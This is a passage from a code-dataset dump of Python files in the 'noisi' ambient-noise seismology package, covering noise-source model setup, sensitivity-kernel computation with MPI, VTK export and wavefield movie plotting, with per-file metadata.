tr[0].stats.sac.kuser1 = ''\n try:\n tr[0].stats.sac.kuser2 = os.path.basename(t).split('.')[7] #os.path.basename(t).split('--')[1].split('.')[3]\n except IndexError:\n sta2 = os.path.basename(t).split('.')[7]\n tr[0].stats.sac.user0 = 100. \n #print(lat1 > -90.)\n #print(lat1 < 90.)\n #print(type(lat1))\n #print(float(lat1))\n #print(lat1,lon1,lat2,lon2)\n \n geoinf = gps2dist_azimuth(lat1,lon1,lat2,lon2)\n tr[0].stats.sac.dist = geoinf[0]\n tr[0].stats.sac.az = geoinf[1]\n tr[0].stats.sac.baz = geoinf[2]\n tr[0].stats['distance'] = geoinf[0] # add stats.distance for section plot\n #print(tr[0].stats.keys())\n\n tr.write(t,format='SAC')\n #tr.plot()\n\n\n\n# # Back to my code\n\n# Check the metadata again\next = '*.sac'\ncorrs_path_obs = os.path.join(path_obs,ext) # get all .sac files in directory\nst = obspy.read(corrs_path_obs) # load all into one stream\nprint(st)\nst.plot()\n\n\n# Plot to see correlations\nif corr_filt_sectionplot: \n st1 = obspy.Stream()\n st2 = obspy.Stream()\n # need to set stats.distance\n for tr in traces:\n t = read(tr)\n t[0].stats.distance = t[0].stats.sac.dist\n #print(t[0].stats.distance)\n t_filt = t\n t_filt.filter('bandpass',freqmin=0.02,freqmax=0.05,zerophase = True)\n #t_filt.plot()\n #t_filt.plot(type='section')\n st1 += t_filt\n st2 += t\n\n st1.plot(type='section')\n #st1.spectrogram(log=True,wlen=50) # spectrogram plot for fun\n #st2.plot(type='section')\n\n\n# # Option 1: dataless measurement\n# All the traces are changed to 1 as if the measurement is 0. \n# That means: synthetic data is compared with dataless observed data.\n# Change all trace.data to 1 if dataless = true or leave if dataless = False\n\nprint(st)\n\nif dataless:\n for trace in st:\n size = np.size(trace.data)\n trace.data = np.ones(size)\nelse:\n pass\n\n# plot dataless data\nst.plot()\n\n\n# # Option 2: compare it to a different source distribution\n# Set dataless = False for this\n# For this, a second source distribution is used to calculate the adjoint source.\n# All above steps are run but the trace.data is not changed.\n"
},
{
"alpha_fraction": 0.6245617866516113,
"alphanum_fraction": 0.6363224983215332,
"avg_line_length": 29.80487823486328,
"blob_id": "e61500d6a8fe2ebbf38df473880ba6773ea2b712",
"content_id": "784c93b00f9a8591688f6fd045760663843da8ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8843,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 287,
"path": "/noisi/util/setup_noisesource.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "\n# coding: utf-8\n\n\nimport numpy as np\nfrom obspy.geodetics import gps2dist_azimuth\nfrom obspy.signal.invsim import cosine_taper\nimport matplotlib.pyplot as plt\nimport h5py\nfrom noisi import WaveField\nimport json\nfrom glob import glob\nimport os\ntry:\n from scipy.fftpack import next_fast_len\nexcept ImportError:\n from noisi.borrowed_functions.scipy_next_fast_len import next_fast_len\nfrom scipy.signal import hann, iirfilter\ntry:\n from scipy.signal import freqz_zpk\nexcept ImportError:\n from noisi.borrowed_functions.scipy_filter_design import freqz_zpk\nfrom noisi.util.geo import get_spherical_surface_elements\n\n##################################################################\n# USER INPUT\n##################################################################\n# path to project and source model\nprojectpath = '../'\nsourcepath = '.'\n\n# geography - a sequence of distributions 'homogeneous', 'ocean',\n# 'gaussian_blob' in any order. The order has to match with the \n# order od the list of spectra in params_spectra, i.e. the first \n# distribution will be assigned the first spectrum, the second \n# distribution the second spectrum, etc. \n# Similarly, the first 'gaussian_blob' will be assigned the first\n# set of parameters in params_gaussian_blobs, and so on.\ndistributions = ['homogeneous']\n\n# Resolution of the coastlines (only relevant for ocean distributions)\n# (see basemap documentation)\n# Use coarser for global and finer for regional models\ncoastres = 'c' \n\n# Geographic gaussian blobs. Will only be used if 'gaussian_blob'\n# is found in the list of distributions. Will be used\n# in order of appearance\nparams_gaussian_blobs = [{'center':(-10.,0.),'sigma_radius_m':2000000.,\n'rel_weight':2.,'only_ocean':True}]\n\n\n# Further parameters are pulled out of the measr_config file.\n###############################################################################\n\ngrd = np.load(os.path.join(projectpath,'sourcegrid.npy'))\nntraces = np.shape(grd)[-1]\nprint('Loaded source grid')\n\n\nconfig = json.load(open(os.path.join(projectpath,'config.json')))\nsource_config = json.load(open(os.path.join(sourcepath,'source_config.json')))\nmeasr_config = json.load(open(os.path.join(sourcepath,'measr_config.json')))\nprint('Loaded config files.')\n\n\n#if len(distributions) != len(measr_config['bandpass']):\n# raise NotImplementedError('Currently, geographic basis functions\\\n#are not yet available and the number of distributions must be == \\\n#the number of spectral basis functions.')\n\n\nif source_config['preprocess_do']:\n ext = '*.h5'\n wavefield_path = os.path.join(sourcepath,'wavefield_processed')\nelse:\n ext = '*.h5'\n wavefield_path = config['wavefield_path']\n\n\nwfs = glob(os.path.join(wavefield_path,ext))\nif wfs != []:\n print('Found wavefield.')\n with WaveField(wfs[0]) as wf:\n df = wf.stats['Fs']\n nt = wf.stats['nt']\n \nelse:\n df = float(input('Sampling rate of synthetic Greens functions in Hz?\\n'))\n nt = int(input('Nr of time steps in synthetic Greens functions?\\n'))\n\n\n\n\n\n#s for the fft is larger due to zeropadding --> apparent higher frequency sampling\\n\",\n # n = next_fast_len(2*nt-1)\nn = next_fast_len(2*nt-1) \nfreq = np.fft.rfftfreq(n,d=1./df)\ntaper = cosine_taper(len(freq),0.01)\nprint('Determined frequency axis.')\n\ndef get_distance(grid,location):\n def f(lat,lon,location):\n return abs(gps2dist_azimuth(lat,lon,location[0],location[1])[0])\n dist = np.array([f(lat,lon,location) for lat,lon in zip(grid[1],grid[0])])\n return dist\n\n# Use Basemap to figure out where ocean is\ndef get_ocean_mask():\n print('Getting ocean mask...')\n from mpl_toolkits.basemap import Basemap\n latmin = grd[1].min()\n latmax = grd[1].max()\n lonmin = grd[0].min()\n lonmax = grd[0].max()\n print(\"Latitude {}--{},\\n\\\nLongitude {}--{}\".format(\n round(latmin,2),\n round(latmax,2),\n round(lonmin,2),\n round(lonmax,2)))\n m = Basemap(rsphere=6378137,resolution=coastres,projection='cea',\n llcrnrlat=latmin,urcrnrlat=latmax,\n llcrnrlon=lonmin,urcrnrlon=lonmax)\n (east,north) = m(grd[0],grd[1])\n\n ocean_mask = [not m.is_land(x,y) for (x,y) in zip(east,north)]#list(map(lambda x,y: not m.is_land(x,y),zip(x,y)))\n return np.array(ocean_mask)\n\n\n \n\ndef get_geodist(disttype,gaussian_params=None):\n\n if disttype == 'gaussian':\n dist = get_distance(grd,gaussian_params['center'])\n gdist = np.exp(-(dist)**2/(2*gaussian_params['sigma_radius_m']**2))\n\n if gaussian_params['only_ocean']:\n if not 'ocean_mask' in locals():\n ocean_mask = get_ocean_mask()\n gdist *= ocean_mask\n\n return gdist\n\n elif disttype == 'homogeneous':\n return np.ones(ntraces)\n\n elif disttype == 'ocean':\n if not 'ocean_mask' in locals():\n ocean_mask = get_ocean_mask()\n return ocean_mask\n\n\ndef get_spectrum(sparams):\n spec = taper*np.exp(-(freq-sparams['central_freq'])**2/\n (2*sparams['sigma_freq']**2))\n return spec / np.max(np.abs(spec))\n\n\ndef get_specbasis(bandpass):\n\n low = bandpass[0]\n high = bandpass[1]\n corners = bandpass[2]\n\n low = low / (0.5*df)\n high = high / (0.5*df)\n\n z, p, k = iirfilter(corners, [low, high], btype='band',\n ftype='butter', output='zpk')\n w, h = freqz_zpk(z,p,k, worN=len(freq))\n \n # always zerophase\n h2 = h*np.conjugate(h)\n \n return np.real(h2)\n\n#########################\n# Create the source distr\n#########################\n\n\n#########################\n# geography\n#########################\nnum_bases = len(distributions)\ngauss_cnt = 0\nbasis_geo = np.zeros((num_bases,ntraces))\n\nprint('Filling distribution...')\n\nfor i in range(num_bases):\n\n if distributions[i] =='gaussian':\n\n gaussparams = params_gaussian_blobs[gauss_cnt]\n gauss_cnt += 1\n basis_geo[i,:] = get_geodist('gaussian',gaussparams)\n\n elif distributions[i] in ['ocean','homogeneous']:\n\n basis_geo[i,:] = get_geodist(distributions[i])\n \n \n else:\n print(distributions)\n raise NotImplementedError('Unknown geographical distributions. \\\n Must be \\'gaussian\\', \\'homogeneous\\' or \\'ocean\\'.')\n\ntry:\n print('Plotting...')\n from noisi.util import plot\n for i in range(num_bases):\n plot.plot_grid(grd[0],grd[1],basis_geo[i,:],normalize=False,\n outfile = os.path.join(sourcepath,'geog_distr_basis{}.png'.format(i)))\nexcept ImportError:\n print('Plotting not possible (is basemap installed?)')\n\n#########################\n# spectrum\n#########################\n\nif measr_config['bandpass'] is None:\n basis_spec = np.array(np.ones(len(freq)),ndmin=2)\n\nelse:\n num_sbases = len(measr_config['bandpass'])\n basis_spec = np.zeros((num_sbases,len(freq)))\n for i in range(num_sbases):\n basis_spec[i,:] = get_specbasis(measr_config['bandpass'][i])\n\n\nplt.figure()\nfor i in range(basis_spec.shape[0]):\n plt.semilogx(freq,basis_spec[i,:],'--')\nplt.xlabel('Frequency (Hz)')\nplt.ylabel('Source power (scaled)')\nplt.savefig(os.path.join(sourcepath,'freq_distr_startingmodel.png'))\n\n\n########################\n# Initial geographic \n# weighting (unif)\n# This will not make sense anymore once\n# the weights matrix is adapted by updates\n########################\n\nweights = np.eye(basis_spec.shape[0],num_bases)\n\n\n########################\n# approximate surface\n# areas of all elements\n# set up in this way.\n########################\n\nif config[\"voronoi_surface_area\"]:\n from noisi.util.voronoi_surface_area import get_voronoi_surface_area\n grd, surf_areas = get_voronoi_surface_area(grd)\nelse:\n surf_areas = get_spherical_surface_elements(grd[0],grd[1])\n\n\n########################\n# Save to an hdf5 file\n########################\nwith h5py.File(os.path.join(sourcepath,'step_0','starting_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float64))\n fh.create_dataset('frequencies',data=freq.astype(np.float64))\n fh.create_dataset('distr_basis',data=basis_geo.astype(np.float64))\n\n # for now: Geographic model can vary freely.\n fh.create_dataset('distr_weights',data=weights)\n fh.create_dataset('spect_basis',data=basis_spec.astype(np.float64))\n fh.create_dataset('surf_areas',data=surf_areas.astype(np.float64))\n\nbasis1_b = np.ones(basis_geo.shape)\nwith h5py.File(os.path.join(sourcepath,'step_0','base_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float32))\n fh.create_dataset('frequencies',data=freq.astype(np.float32))\n fh.create_dataset('distr_basis',data=basis1_b.astype(np.float32))\n fh.create_dataset('distr_weights',data=weights.astype(np.float32))\n fh.create_dataset('spect_basis',data=basis_spec.astype(np.float32))\n fh.create_dataset('surf_areas',data=surf_areas.astype(np.float64))\n\nprint('Done.')\n\n"
},
{
"alpha_fraction": 0.45604395866394043,
"alphanum_fraction": 0.4829059839248657,
"avg_line_length": 25.419355392456055,
"blob_id": "0e9b2dc69e6c14cd0b349a66f09035edf7dbfcba",
"content_id": "4973e08ade4715e515973f3986bf145e9a8b4612",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1638,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 62,
"path": "/noisi/util/make_vtk_from_data.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom meshpy.tet import build, Options, MeshInfo\nimport pyvtk\nfrom pyvtk import PointData, Scalars\nimport os\nimport sys\nimport h5py\n\ninfile = sys.argv[1]\ntry: \n sourcegrid = sys.argv[2]\nexcept:\n pass\noutfilename = os.path.splitext(infile)[0]\n\n#============================================================\n#- Read input.\n#============================================================\n\nprint('Read data ...')\ntry:\n m = np.load(infile)\n grd = np.load(sourcegrid)\nexcept:\n n = h5py.File(infile,'r')\n m = n['distr_basis'][:]\n grd = n['coordinates'][:]\n\nlat = grd[1]\nlon = grd[0]\n\n\n#============================================================\n#- Triangulation.\n#============================================================\n\nfor i in range(0,m.shape[0]):\n S = m[i,:]\n outfile = outfilename+'.'+str(i)+'.vtk'\n print('Compute Delauney triangulation ...')\n \n x=6371.0*np.cos(lat*np.pi/180.0)*np.cos(lon*np.pi/180.0)\n y=6371.0*np.cos(lat*np.pi/180.0)*np.sin(lon*np.pi/180.0)\n z=6371.0*np.sin(lat*np.pi/180.0)\n \n pts=np.array((x, y, z)).T\n mesh_info=MeshInfo()\n mesh_info.set_points(pts)\n opts=Options(\"Q\")\n mesh=build(mesh_info, options=opts)\n elements=mesh.elements\n \n #============================================================\n #- Write vtk file.\n #============================================================\n \n print('Write vtk file ...')\n \n vtkElements = pyvtk.VtkData(pyvtk.UnstructuredGrid(pts, tetra=elements), \n PointData(Scalars(S, 'grad_PSD_ZZ')), \"Mesh\")\n vtkElements.tofile(outfile)\n"
},
{
"alpha_fraction": 0.5720384120941162,
"alphanum_fraction": 0.5787975788116455,
"avg_line_length": 38.04166793823242,
"blob_id": "cd0f514abe1e5666b64bd6ee0af70eaf244c8ed9",
"content_id": "1c57082cd1a818aab4876c8aaefaa082174a92be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2811,
"license_type": "no_license",
"max_line_length": 217,
"num_lines": 72,
"path": "/noisi/my_classes/basisfunctions.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n# ToDo: Might not be necessary to have a separate class for this, but could be incorporated into the NoiseSource class.\n# ToDo: Docs\n\n# ToDo: This object is out of date. The idea was to have it in order to flexibly work with different bases, such as Gaussians, spherical harmonics, etc.\n# This may be still useful in the future so keep this fragment.\n\nclass MyBasis(object):\n \n def __init__(self,btype,params):\n \"\"\"\n possible types and parameters:\n 'boxcar' (like, linear frequency or period or time bins), params: nr. of bins\n 'gaussian' (Gaussians; params: mean and standard deviation as tuple)\n #ToDo: Maybe: Include default parameters\n \"\"\"\n\n\n \n # Is the type needed?\n self.btype = btype\n self.params = params\n \n\n #if isinstace(params,np.ndarray):\n # self.params = params\n #elif isinstance(params,str):\n # try:\n # self.params = np.load(params)\n # except:\n # raise IOError('Basis function file not found.')\n #else:\n # raise TypeError\n #\n\n def to_grid(self,grid):\n \"\"\"\n For basis functions defined in a simple manner -- e.g. 'Five frequency\n bins' return the basis functions on the specified grid. This depends on the type of basis function.\n :type grid: np.ndarray\n :param grid: The grid on which our simulation lives. This can be a time- or frequency axis, or a coordinate grid. ToDo: Think about how to handle meshgrids vs. coordinate lists (this is only a rearrangement).\n \"\"\"\n\n basis_grid = None\n\n if self.btype == 'boxcar': #This is mostly for understanding the principle.\n # Get the actual value of self.params! self.params is mutable. No modification wanted...\n basis_shape = [self.params[0]] #if self.params[0] > 1. else []\n basis_shape.extend(i for i in np.shape(grid))\n \n basis_grid = np.zeros(basis_shape)\n step = len(grid) // basis_shape[0]\n for i in np.arange(basis_shape[0]):\n basis_grid[i,i*step:(i+1)*step] = 1.\n\n \n\n #if self.btype == 'gaussian':\n # basis_shape = [len(self.params)] #if self.params not None else [1.]\n # basis_shape.extend(i for i in np.shape(grid))\n # basis_grid = np.zeros(basis_shape)\n # for i in np.arange(len(self.params)):\n # mu = self.params[i][0]\n # sig2 = self.params[i][1]**2\n # # ToDo: Use normalized Gaussians yes or no?\n # basis_grid[i,:] += np.exp(-1*(grid-mu)**2/(2*sig2))\n \n if np.shape(basis_grid)[0] > 1.:\n return basis_grid\n else:\n return basis_grid[0]\n"
},
{
"alpha_fraction": 0.4929151237010956,
"alphanum_fraction": 0.5073062777519226,
"avg_line_length": 31.030733108520508,
"blob_id": "1c2bf1939ba71983cf5aba4462fafea6b069c3ca",
"content_id": "7d380853b9498625d6da0683597e41c7eb7d0b93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13550,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 423,
"path": "/noisi/scripts/run_kernel.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nfrom mpi4py import MPI\nimport numpy as np\nimport os\nimport h5py\nimport json\nimport click\nfrom glob import glob\nfrom math import ceil\nfrom scipy.signal.signaltools import fftconvolve\ntry:\n from scipy.fftpack import next_fast_len, hilbert\nexcept ImportError:\n from noisi.borrowed_functions.scipy_next_fast_len import next_fast_len\nfrom obspy import Trace, read, Stream\nfrom noisi import NoiseSource, WaveField\nfrom noisi.util import geo#, natural_keys\nfrom obspy.signal.invsim import cosine_taper\nfrom noisi.util import filter\ntry:\n from scipy.signal import sosfilt\nexcept ImportError:\n from obspy.signal._sosfilt import _sosfilt as sosfilt\nfrom noisi.util.windows import my_centered, zero_buddy\nfrom noisi.util.geo import geograph_to_geocent\nfrom noisi.util.corr_pairs import *\nimport matplotlib.pyplot as plt\nimport instaseis\n\n\n\n#ToDo: put in the possibility to run on mixed channel pairs\ndef paths_input(cp,source_conf,step,ignore_network,instaseis):\n \n inf1 = cp[0].split()\n inf2 = cp[1].split()\n \n conf = json.load(open(os.path.join(source_conf['project_path'],\n 'config.json')))\n measr_conf = json.load(open(os.path.join(source_conf['source_path'],\n 'measr_config.json')))\n channel = source_conf['channel']\n \n # station names\n if ignore_network:\n sta1 = \"*.{}..{}\".format(*(inf1[1:2]+[channel]))\n sta2 = \"*.{}..{}\".format(*(inf2[1:2]+[channel]))\n else:\n sta1 = \"{}.{}..{}\".format(*(inf1[0:2]+[channel]))\n sta2 = \"{}.{}..{}\".format(*(inf2[0:2]+[channel]))\n\n\n # Wavefield files \n if instaseis == False:\n if source_conf['preprocess_do']:\n dir = os.path.join(source_conf['source_path'],'wavefield_processed')\n \n else:\n dir = conf['wavefield_path']\n \n wf1 = glob(os.path.join(dir,sta1+'.h5'))[0]\n wf2 = glob(os.path.join(dir,sta2+'.h5'))[0]\n else:\n # need to return two receiver coordinate pairs. \n # For buried sensors, depth could be used but no elevation is possible,\n # so maybe keep everything at 0 m?\n # lists of information directly from the stations.txt file.\n wf1 = inf1\n wf2 = inf2\n\n \n # Starting model for the noise source\n \n # The base model contains no spatial or spectral weights.\n nsrc = os.path.join(source_conf['project_path'],\n source_conf['source_name'],'step_'+str(step),\n 'base_model.h5')\n \n # Adjoint source\n if measr_conf['mtype'] in ['energy_diff','envelope']:\n adj_src_basicnames = [ os.path.join(source_conf['source_path'],\n 'step_'+str(step),\n 'adjt',\"{}--{}.c\".format(sta1,sta2)),\n os.path.join(source_conf['source_path'],\n 'step_'+str(step),\n 'adjt',\"{}--{}.a\".format(sta1,sta2))]\n else:\n adj_src_basicnames = [os.path.join(source_conf['source_path'],\n 'step_'+str(step),\n 'adjt',\"{}--{}\".format(sta1,sta2))]\n\n\n \n return(wf1,wf2,nsrc,adj_src_basicnames)\n \n \ndef paths_output(cp,source_conf,step):\n \n\n id1 = cp[0].split()[0]+cp[0].split()[1]\n id2 = cp[1].split()[0]+cp[1].split()[1]\n\n if id1 < id2 :\n inf1 = cp[0].split()\n inf2 = cp[1].split()\n else:\n inf2 = cp[0].split()\n inf1 = cp[1].split()\n\n channel = source_conf['channel']\n sta1 = \"{}.{}..{}\".format(*(inf1[0:2]+[channel]))\n sta2 = \"{}.{}..{}\".format(*(inf2[0:2]+[channel]))\n \n\n kern_basicname = \"{}--{}\".format(sta1,sta2)\n kern_basicname = os.path.join(source_conf['source_path'],\n 'step_'+str(step), 'kern',\n kern_basicname)\n\n return (kern_basicname)\n \ndef get_ns(wf1,source_conf,insta):\n \n # Nr of time steps in traces\n if insta:\n # get path to instaseis db\n #ToDo: ugly.\n dbpath = json.load(open(os.path.join(source_conf['project_path'],\n 'config.json')))['wavefield_path']\n # open \n db = instaseis.open_db(dbpath)\n # get a test seismogram to determine...\n stest = db.get_seismograms(source=instaseis.ForceSource(latitude=0.0,\n longitude=0.0),receiver=instaseis.Receiver(latitude=10.,\n longitude=0.0),dt=1./source_conf['sampling_rate'])[0]\n \n nt = stest.stats.npts\n Fs = stest.stats.sampling_rate\n else:\n with WaveField(wf1) as wf1:\n nt = int(wf1.stats['nt'])\n Fs = round(wf1.stats['Fs'],8)\n \n # Necessary length of zero padding for carrying out \n # frequency domain correlations/convolutions\n n = next_fast_len(2*nt-1) \n \n # Number of time steps for synthetic correlation\n n_lag = int(source_conf['max_lag'] * Fs)\n if nt - 2*n_lag <= 0:\n click.secho('Resetting maximum lag to %g seconds: Synthetics are too\\\n short for a maximum lag of %g seconds.' %(nt//2/Fs,n_lag/Fs))\n n_lag = nt // 2\n \n n_corr = 2*n_lag + 1\n \n return nt,n,n_corr,Fs\n \n \n\n\n\ndef g1g2_kern(wf1str,wf2str,kernel,adjt,\n src,source_conf,insta):\n \n measr_conf = json.load(open(os.path.join(source_conf['source_path'],\n 'measr_config.json')))\n\n\n bandpass = measr_conf['bandpass']\n\n if bandpass == None:\n filtcnt = 1\n elif type(bandpass) == list:\n if type(bandpass[0]) != list:\n filtcnt = 1\n else:\n filtcnt = len(bandpass) \n \n ntime, n, n_corr, Fs = get_ns(wf1str,source_conf,insta)\n # use a one-sided taper: The seismogram probably has a non-zero end, \n # being cut off whereever the solver stopped running.\n taper = cosine_taper(ntime,p=0.01)\n taper[0:ntime//2] = 1.0\n\n \n########################################################################\n# Prepare filenames and adjoint sources\n######################################################################## \n\n filenames = []\n adjt_srcs = []\n adjt_srcs_cnt = 0\n\n for ix_f in range(filtcnt):\n \n filename = kernel+'.{}.npy'.format(ix_f)\n filenames.append(filename)\n #if os.path.exists(filename):\n # continue\n\n f = Stream()\n for a in adjt:\n adjtfile = a + '*.{}.sac'.format(ix_f)\n adjtfile = glob(adjtfile)\n try: \n f += read(adjtfile[0])[0]\n f[-1].data = my_centered(f[-1].data,n_corr)\n adjt_srcs_cnt += 1\n except IndexError:\n print('No adjoint source found: {}\\n'.format(a))\n break\n\n adjt_srcs.append(f)\n \n \n\n########################################################################\n# Compute the kernels\n######################################################################## \n\n\n with NoiseSource(src) as nsrc:\n\n \n ntraces = nsrc.src_loc[0].shape[0]\n\n\n if insta:\n # open database\n dbpath = json.load(open(os.path.join(source_conf['project_path'],\n 'config.json')))['wavefield_path']\n # open and determine Fs, nt\n db = instaseis.open_db(dbpath)\n # get receiver locations\n lat1 = geograph_to_geocent(float(wf1[2]))\n lon1 = float(wf1[3])\n rec1 = instaseis.Receiver(latitude=lat1,longitude=lon1)\n lat2 = geograph_to_geocent(float(wf2[2]))\n lon2 = float(wf2[3])\n rec2 = instaseis.Receiver(latitude=lat2,longitude=lon2)\n\n else:\n wf1 = WaveField(wf1str)\n wf2 = WaveField(wf2str)\n\n kern = np.zeros((filtcnt,ntraces,len(adjt)))\n\n \n\n \n \n \n ########################################################################\n # Loop over locations\n ######################################################################## \n for i in range(ntraces):\n\n # noise source spectrum at this location\n # For the kernel, this contains only the basis functions of the \n # spectrum without weights; might still be location-dependent, \n # for example when constraining sensivity to ocean\n S = nsrc.get_spect(i)\n \n\n if S.sum() == 0.: \n # The spectrum has 0 phase so only checking absolute value here\n continue\n\n ####################################################################\n # Get synthetics\n #################################################################### \n if insta:\n # get source locations\n lat_src = geograph_to_geocent(nsrc.src_loc[1,i])\n lon_src = nsrc.src_loc[0,i]\n fsrc = instaseis.ForceSource(latitude=lat_src,\n longitude=lon_src,f_r=1.e12)\n \n s1 = np.ascontiguousarray(db.get_seismograms(source=fsrc,\n receiver=rec1,\n dt=1./source_conf['sampling_rate'])[0].data*taper)\n s2 = np.ascontiguousarray(db.get_seismograms(source=fsrc,\n receiver=rec2,\n dt=1./source_conf['sampling_rate'])[0].data*taper)\n \n\n else:\n s1 = np.ascontiguousarray(wf1.data[i,:]*taper)\n s2 = np.ascontiguousarray(wf2.data[i,:]*taper)\n \n \n\n spec1 = np.fft.rfft(s1,n)\n spec2 = np.fft.rfft(s2,n)\n \n \n g1g2_tr = np.multiply(np.conjugate(spec1),spec2)\n c = np.multiply(g1g2_tr,S)\n\n #######################################################################\n # Get Kernel at that location\n ####################################################################### \n corr_temp = my_centered(np.fft.ifftshift(np.fft.irfft(c,n)),n_corr)\n \n #######################################################################\n # Apply the 'adjoint source'\n #######################################################################\n for ix_f in range(filtcnt):\n f = adjt_srcs[ix_f]\n\n if f==None:\n continue\n for j in range(len(f)):\n delta = f[j].stats.delta\n \n kern[ix_f,i,j] = np.dot(corr_temp,f[j].data) * delta\n \n\n #elif measr_conf['mtype'] in ['envelope']:\n # if j == 0:\n # corr_temp_h = corr_temp\n # print(corr_temp_h)\n # if j == 1:\n # corr_temp_h = hilbert(corr_temp)\n # print(corr_temp_h)\n # \n # kern[ix_f,i,j] = np.dot(corr_temp,f[j].data) * delta\n \n \n \n if i%50000 == 0:\n print(\"Finished {} source locations.\".format(i))\n\n\n if not insta:\n wf1.file.close()\n wf2.file.close()\n\n for ix_f in range(filtcnt):\n filename = filenames[ix_f]\n if kern[ix_f,:,:].sum() != 0:\n np.save(filename,kern[ix_f,:,:]) \n return()\n\n \n\n\n\ndef run_kern(source_configfile,step,ignore_network=False):\n\n\n # simple embarrassingly parallel run:\n\n comm = MPI.COMM_WORLD\n size = comm.Get_size()\n rank = comm.Get_rank()\n\n step = int(step)\n\n\n #ToDo think about that configuration decorator\n source_config=json.load(open(source_configfile))\n measr_config = json.load(open(os.path.join(source_config['source_path'],\n 'measr_config.json')))\n\n obs_only = source_config['model_observed_only']\n #ToDo: ugly.\n insta = json.load(open(os.path.join(source_config['project_path'],\n 'config.json')))['instaseis']\n\n auto_corr = False # default value\n try:\n auto_corr = source_config['get_auto_corr']\n except KeyError:\n pass\n\n p = define_correlationpairs(source_config['project_path'],\n auto_corr = auto_corr)\n if rank == 0:\n print('Nr all possible kernels %g ' %len(p))\n \n # Remove pairs for which no observation is available\n if obs_only:\n directory = os.path.join(source_config['source_path'],\n 'observed_correlations')\n p = rem_no_obs(p,source_config,directory=directory)\n if rank == 0:\n print('Nr kernels after checking available observ. %g ' %len(p))\n \n\n\n # The assignment of station pairs should be such that one core \n # has as many occurrences of the same station as possible; \n # this will prevent that many processes try to access the \n # same hdf5 file all at once.\n num_pairs = int( ceil(float(len(p))/float(size)) )\n p_p = p[ rank*num_pairs : rank*num_pairs + num_pairs] \n \n print('Rank number %g' %rank)\n print('working on pair nr. %g to %g of %g.' %(rank*num_pairs,\n rank*num_pairs+num_pairs,len(p)))\n\n\n \n for cp in p_p:\n \n try:\n wf1,wf2,src,adjt = paths_input(cp,source_config,\n step,ignore_network,insta)\n print(wf1,wf2,src)\n kernel = paths_output(cp,source_config,step)\n print(kernel)\n \n except:\n print('Could not find input for: %s\\\n\\nCheck if wavefield .h5 file and base_model file are available.' %cp)\n continue\n\n\n kern = g1g2_kern(wf1,wf2,kernel,adjt,src,source_config,insta=insta)\n \n return()\n\n"
},
{
"alpha_fraction": 0.6161380410194397,
"alphanum_fraction": 0.6506530046463013,
"avg_line_length": 29.72058868408203,
"blob_id": "fc248ac7eaeb8e1d4fc4df96d000b39618f1ee52",
"content_id": "a540750e2a5cab5c4c271d22206f4d2d92985afc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2144,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 68,
"path": "/noisi/util/wavefield_movie.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "# This example uses a MovieWriter directly to grab individual frames and\n# write them to a file. This avoids any event loop integration, but has\n# the advantage of working with even the Agg backend. This is not recommended\n# for use in an interactive setting.\n# -*- noplot -*-\n\nimport numpy as np\nimport matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as manimation\nfrom noisi import WaveField\nimport sys\nfrom mpl_toolkits.basemap import Basemap\nfrom matplotlib.mlab import griddata\nimport matplotlib.tri as tri \n\n\n#################################\nv = 1.\nstations = [(0.,0.)]\nlonmin=-120.\nlonmax=120.\nlatmin=-60.\nlatmax=60.\nlatc=0.0\nlonc=0.0\nresolution = 4\nfps = 0.5\n\nwf = WaveField(sys.argv[1])\nt_min = float(sys.argv[2])\nt_max = float(sys.argv[3])\nt_step = float(sys.argv[4])\nfilename = sys.argv[5]\n#################################\n\nFFMpegWriter = manimation.writers['ffmpeg']\nmetadata = dict(title='Wavefield', artist='Matplotlib',\n comment='Movie support!')\nwriter = FFMpegWriter(fps=fps, metadata=metadata)\n\nfig = plt.figure()\nplt.subplot(111)\n\nmap_x = wf.sourcegrid[0]\nmap_x = map_x[0::resolution]\nmap_y = wf.sourcegrid[1]\nmap_y = map_y[0::resolution]\ntriangles = tri.Triangulation(map_x,map_y)\nm = Basemap(rsphere=6378137,resolution='c',projection='cyl',lat_0=latc, lon_0=lonc,llcrnrlat=latmin,urcrnrlat=latmax,\n llcrnrlon=lonmin,urcrnrlon=lonmax)\n \nm.drawcoastlines(linewidth=0.5)\nm.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0]) # draw parallels\nm.drawmeridians(np.arange(-180,210,60.),labels=[0,0,0,1]) # draw meridians\nfor sta in stations:\n m.plot(sta[0],sta[1],'rv',markersize=10,latlon=True)\n\n\nwith writer.saving(fig, filename, 100):\n for t in np.arange(t_min,t_max,t_step):\n print(t)\n map_z = wf.get_snapshot(t,resolution=resolution)\n #if globe:\n # map_z = np.append(map_z,map_z[0])\n plt.tripcolor(triangles, map_z/np.max(np.abs(map_z)), shading='flat', vmin=-v,vmax=v, cmap=plt.cm.bwr)\n writer.grab_frame()\n \n\n \n \n \n \n"
},
{
"alpha_fraction": 0.6184738874435425,
"alphanum_fraction": 0.6198126077651978,
"avg_line_length": 28.8799991607666,
"blob_id": "6e391280ef6f0392579eca32168a3e539e07b22a",
"content_id": "b5f9808342d3ccf3014e98637fe4cb2dbe4c5dd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 747,
"license_type": "no_license",
"max_line_length": 89,
